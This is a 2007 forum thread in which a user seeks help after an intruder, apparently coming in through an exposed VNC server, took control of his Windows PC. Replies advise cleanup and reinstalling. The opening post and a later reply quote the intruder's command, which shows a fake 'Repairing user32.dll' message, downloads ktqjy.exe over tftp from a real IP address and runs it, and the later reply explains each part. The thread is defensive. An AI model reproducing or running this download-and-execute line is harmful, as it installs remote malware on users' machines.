Trojan from using VNC Viewer Software

Discussion in 'Security Software' started by Matt, Mar 30, 2007.

  1. Matt

    Matt Guest

    Hey guys. I've bene using the VNC Viewer software to access a Linux
    environment at my University's Linux servers.

    However, I have over the last few days had a number of occurances of a
    Trojan somehow finding its way onto my computer. At some point I would
    suddenly lose control of the computer. A Task Manager window would
    come up, followed by a run window. In this run window the following
    two things are entered:

    %comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i
    64.79.213.12 GET ktqjy.exe & start ktqjy&

    %systemroot%\system32\cmd.exe

    In the past I have always been at my computer, so I have been able to
    interrupt it by just turning the computer off before it can do that it
    is trying to do. Following the last occurance I spent all afternoon
    running virus scans and spyware scans using:

    AVG Anti virus
    AVG anti spyware
    Zonealarm Pro's spyware scanner
    Spybot Search and Destroy

    A Trojan was found (called Generic3.ARX) by AVG and a number of
    Spyware items were found and deleted. Satisfied that allw as well, I
    opened up the VNC Viewer software and got back to work.

    However, today whilst I went away to get a drink the Trojan ran again.
    This time I was unable to interrupt it and I came back to find a Task
    manager window, a run window and a command prompt all open. Clearly
    whatever the Trojan tries to do it has succeeded. I am running both
    AVG anti virus and anti spyware scans at the moment but nothing
    appears to be coming up this time.

    Therefore, what can I do to eradicate whatever this Trojan has done to
    my computer? What sort of things would this Trojan do? (or begin doing
    as we speak?). Simply stop using VNC Viewer is not an option as I need
    it to do my coursework.

    I run the latest version of ZoneAlarm Pro along with the other
    programmes mentioned above to combat spyware.

    Kind regards,

    Matt
     
    Matt, Mar 30, 2007
    #1
    1. Advertisements

  2. Matt

    Spack Guest

    Matt wrote on 30 Mar 2007 08:55:11 -0700:

    This should have nothing to do with the Viewer, are you sure you didn't also
    install the Server on your own machine and leave the port open to the
    outside world? See http://www.realvnc.com/pipermail/vnc-list/2007-February/057050.html
    for more info, basically someone/something is connecting to the VNC Server
    on your machine bypassing the authentication, and then running the commands
    (either manually or using a script, most likely using a script). I'm
    guessing that when you downloaded and installed VNC Viewer you actually
    download the full Client+Server package and installed both, and you allowed
    VNC Server to listen in Zone Alarm, probably when it first ran and you
    blindly hit the Allow button. Get your machine cleaned and uninstall VNC
    Server - you do not need the server component to use the Viewer to access
    another machine.

    Dan
     
    Spack, Mar 30, 2007
    #2
    1. Advertisements

  3. Matt

    Leythos Guest

    First, how do you know it's a trojan STILL on your system?

    Did you reset the VNC connection password?

    Did you change the default VNC Server port to something other than 5900?

    Why is your computer exposed directly to the internet instead of behind a
    NAT appliance of some type?



    --
    Want to know what PCBUTTS1 is really about?
    *** WARNING - this links contains foul/pornographic content of an
    abusive nature created by PCBUTTS1 and still hosted on his public
    website ***
    http://www.pcbutts1.com/downloads/leythos.htm
     
    Leythos, Mar 30, 2007
    #3
  4. Matt

    Matt Guest

    First, how do you know it's a trojan STILL on your system?

    That's an assumption I am making, I doubt the Trojan would kindly
    remove all traces of itself once it has done what it wanted to do.
    I've run scans in all the programmes I mentioned above and one of them
    could find any mention of this Trojan, so it was has clearly tidied up
    after itself very well.
    I'm using VNC Viewer 4.1.2 (the free one) which has no such option
    Again, I had no such option
    I use a router (which HAD the ports open for VNC I thought I needed,
    but I have just closed them realising of course that they aren't
    actually needed), along with Zonealarm, so I don't see myself as being
    directly connected to the Internet.

    Kind regards,

    Matt
     
    Matt, Mar 30, 2007
    #4
  5. Matt

    Matt Guest

    This should have nothing to do with the Viewer, are you sure you didn't also
    You are absolutely right, I did install the full package and probably
    did tell ZoneAlarm to let it have special prividedges. I will
    uninstall it right away. The only problem is that I don't think I am
    going to be able to "clean" ym computer, because after running all the
    scans I mentioend above, none of them came up with anything.

    Is their anything I can do aside from reformatting my computer to
    ensure I get rid of this?

    Kind Regards,

    Matt
     
    Matt, Mar 30, 2007
    #5
  6. Matt

    Matt Guest

    First, how do you know it's a trojan STILL on your system?

    That's an assumption I am making, I doubt the Trojan would kindly
    remove all traces of itself once it has done what it wanted to do.
    I've run scans in all the programmes I mentioned above and one of them
    could find any mention of this Trojan, so it was has clearly tidied up
    after itself very well.
    I'm using VNC Viewer 4.1.2 (the free one0 which has no such option
    Again, I had no such option
    I use a router (which HAD the ports open for VNC I thought I needed,
    but I have just closed them realising of course that they aren't
    actually needed), along with Zonealarm, so I don't see myself as being
    directly connected to the Internet.

    Kind regards,

    Matt
     
    Matt, Mar 30, 2007
    #6
  7. Matt

    Default User Guest

    Use Autoruns to look for startup programs that you didn't authorize. Look
    for any instances of DLL files being loaded on startup that are not
    authorized. You can try looking in the System32 directory for recently
    modified files, or hidden files that have random names like xzlk.dll, and
    send the files found to http://www.virustotal.com/en/indexf.html for
    analysis. You could also try running a spyware scanner like Spybot Search
    & Destroy or SuperAntiSpyware; the later can detect files based on
    characteristics like size, random file names, and other attributes that are
    common among trojans and malware.
     
    Default User, Mar 30, 2007
    #7
  8. Matt

    Mr. Arnold Guest

    Is their anything I can do aside from reformatting my computer to
    <http://www.microsoft.com/technet/community/columns/secmgmt/sm0504.mspx>
     
    Mr. Arnold, Mar 30, 2007
    #8
  9. Matt

    Matt Guest

    That makes for some interesting reading, looks like a reformat is the
    only option.

    Thanks to everyone for all the replies.

    Kind Regards,

    Matt
     
    Matt, Mar 31, 2007
    #9
  10. Matt

    Rick Merrill Guest

    There are exploits that modify the POST code and BIOS so that even
    reformatting may not help :-( Is it time for a new computer???
     
    Rick Merrill, Mar 31, 2007
    #10
  11. Matt

    kurt wismer Guest

    ??? i've never heard of anything specifically modifying the power on
    self test (post) facility of a computer (isn't it *part of* the bios?)...

    as for the bios, the only modifications any known malware has ever made
    is to corrupt flashable bios, and that is rather noticable as it stops
    the computer from booting...

    so no, it's not time for a new computer yet...
     
    kurt wismer, Mar 31, 2007
    #11
  12. Yes and no.

    Everything that restores your computer to a well-known safe state is an
    option. If you have a verified backup, you can restore from that. You can
    compare against a complete reference system. If you have a backup
    containing a list of checksums of all system-relevant files, you can detect
    the changes and selective restore these parts (or verify them as harmless
    changes). You can boot a trusted system and verify all signed binaries and
    just restore all relevant data files (Windows Registry and some other
    databases, some INF and INI files, boot sector etc.).

    But, if no such safe reference exists, the only well-known safe state is a
    fresh install. Sadly, this is the most common case.
     
    Sebastian Gottschalk, Apr 1, 2007
    #12
  13. Actually it's quite trivial to modify the BIOS (intentionally!), see what
    the BIOS modder communities are achieving. It would be no problem to
    implement such malware.

    There have been extensive discussions about the default settings for
    enabling flashing the BIOS as well as how well these actually work. If you
    have a hardware-implemented switch, if it's set to disabled, and you flash
    chip is not one of those old Intel or Amtel chips from before about 2001,
    it shouldn't be possible to flash the BIOS.
     
    Sebastian Gottschalk, Apr 1, 2007
    #13
  14. Matt

    Matt Guest

    ??? i've never heard of anything specifically modifying the power on
    Well I formatted and reinstalled Windows a few days ago now and
    everything seems to be running smoothly.

    Thanks again for all the replies on this topic.

    Kind regards,

    Matt
     
    Matt, Apr 3, 2007
    #14
  15. Matt

    kingthorin Guest

    Well assuming your original post contains the only commands that were
    run here's what we can figure out.

    "%comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -
    i
    64.79.213.12 GET ktqjy.exe & start ktqjy& "

    %comspec% is an environment variable on windows system which points to
    the command prompt executable. We can verify this by launching a
    command prompt and echo'ing the value to the screen, ie:
    C:\Documents and Settings\someuser>echo %comspec%
    C:\WINNT\system32\cmd.exe

    Next we can see what the /c switch does for the command prompt
    (cmd.exe), ie:
    C:\Documents and Settings\someuser>cmd.exe /?
    Starts a new instance of the Windows XP command interpreter

    CMD [/A | /U] [/Q] [/D] [/E:ON | /E:OFF] [/F:ON | /F:OFF] [/V:ON | /
    V:OFF]
    [[/S] [/C | /K] string]

    /C Carries out the command specified by string and then
    terminates

    Ok so /c carries out the commands provided when cmd.exe is called (via
    %comspec%).

    Next we see that he echo'd some useless junk to the
    screen....Repairing....Please Wait, laaa deee daaaa.

    Next he uses tftp to connect to 64.79.213.12 and get ktqjy.exe. We can
    verify this by checking the command optionsn for tftp:

    C:\Documents and Settings\someuser>tftp /?

    Transfers files to and from a remote computer running the TFTP
    service.

    TFTP [-i] host [GET | PUT] source [destination]

    -i Specifies binary image transfer mode (also called
    octet). In binary image mode the file is moved
    literally, byte by byte. Use this mode when
    transferring binary files.

    So -i specifies binary transfer which is what he'd need for a
    executable (exe).

    Lastly he launches ktqjy.

    ktqjy.exe should be sitting in whatever the default directory of your
    command prompt is, something like "C:\Documents and Settings\someuser"
    if you goto the start menu select run type cmd and hit ok it'll be
    displayed on the screen. You can navigate to this directory in
    explorer and delete the file. You may have to launch task manager and
    "End Process" on it first. Also you should fire up msconfig (start:run
    msconfig) and review all your startup items.

    etc....

    Just follow the information you have.
     
    kingthorin, Apr 3, 2007
    #15
  16. In the meanwhile, ktqjy.exe has modified various system binaries, imposed
    some kernel hooks such that killing just removes it from the list of
    processed (but still keeps on running) and doesn't list the three other
    copies of itself not any more, has downloaded 5 other binaries and executed
    some, modified some system settings to open some obstrusive security
    vulnerabilities to allow easier reinfection, ...

    Oh, and it might have simply modified the previous history.

    Short to say: You have no reliable information whatsoever.
     
    Sebastian Gottschalk, Apr 4, 2007
    #16
    1. Advertisements

Ask a Question

Want to reply to this thread or ask your own question?

You'll need to choose a username for the site, which only take a couple of moments (here). After that, you can post your question and our members will help you out.